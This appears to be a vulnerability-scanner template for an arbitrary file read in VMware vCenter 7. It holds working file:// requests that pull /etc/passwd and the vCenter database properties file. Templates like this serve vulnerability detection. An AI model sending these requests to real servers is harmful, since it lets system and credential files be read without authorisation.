id: vmware-vcenter-7-arbitrary-file-read

info:
  name: 
  author: xpoc
  severity: critical
  verified: true
  tags: vmware,vmware-vcenter,lfi

rules:
    linux0:
        request:
            method: GET
            path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
    win0:
        request:
            method: GET
            path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///C:/ProgramData/VMware/vCenterServer/cfg/vmware-vpx/vcdb.properties
        expression: response.status == 200 && response.body.bcontains(b"org.postgresql.Driver")
expression: win0() || linux0()